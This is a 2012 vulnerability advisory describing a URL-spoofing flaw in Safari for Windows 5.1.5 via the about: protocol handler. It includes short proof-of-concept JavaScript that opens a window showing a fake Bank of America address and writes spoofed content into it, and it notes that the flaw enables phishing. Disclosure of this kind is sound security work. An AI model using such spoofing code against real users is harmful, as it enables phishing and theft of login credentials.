###########################################
Safari for windows 5.1.5 and prior URL window.open() spoof
Vendor URL: http://www.apple.com
Advisore: http://lostmon.blogspot.com/2012/03/safari-for-windows-515-and-prior-and.html
Vendor Notify: YES Exploit available: YES
##########################################
##############
History:
##############
Safari has a serious issues with protocol handlers, for long times in
diferents protocols and handlers i had report four or five
vulnerabilities in protocols handlers. i had report a telnet issue in
safari for windows, what Apple patched in silence.
Today i download and test Safari for windows 5.1.5 only for look if
the vulnerability that i report in 03/2012 is patched.. see =>
http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Safari for windows 5.1.5 have the same vulnerability ummm....
############
Description
############
Safari set the bar higher for web browsers. It introduced
sophisticated design elements that made browsing a joy. Easy to use,
Safari stayed out of your way and let you effortlessly navigate from
site to site. Safari for windows Ignore what protocol handler we use,
it don't check if protocol is registered or simply don't check any
handler... In the case what i talk.... A pseudo url spoof can be
posible let's to see some examples to undestanding the nature of this
vulnerability.
Case "about:" Protocol handler. type in addressbar "about:blank" .
and it shows about blank page, this is what we espect and this
template is OK. Type in addressbar "about:something" and the title and
URL shows the same (about:something) type
"about:http://www.bankofamerica.com" and the tithe shows the same...
Now the best thing is write a title to simulate the title of original
page and write some content in this window
(about:http://www.bankofamerica.com) the URL show it but in reality we
are in about:blank page...
############
PoC's
############
Create a function to open a new window and write location...
var wx; function invokePoC() { wx =
open("about:http://www.bankofamerica.com/login","newwin");
setInterval("doit()",1); }
And create a function to write in the result window.
function doit() { wx.document.open(); wx.document.write("spoof
title
Hello !! i'm a Spoofed Site
!!!
"); }
With this a remote attacker can do spoof o phishing attacks, but if
we think that safari has issues in handlers the best attack is delete
about: protocol handler and simulate bankofamerica for example. we can
oncatenate a www as a handler and concatenate http: handler to get a
nice url :)
##########################
Safari for windows URL Spoof
##########################
This PoC simulate banc of america URL and content. The image is
enbended via Data: schema.
Safari for windows 5.1.5 and prior URL spoof window.open()
test case.
Safari for windows 5.1.5 and prior URL pseudo-spoof window.open()
test case.
and Look in result window, the address bar , show The url and if you write
any url in the address bar, the browser can't navigate to it. This issue can be
used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and
prior versions, also Safari for IOS is Too vulnerable.
####################### €Nd ######################
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....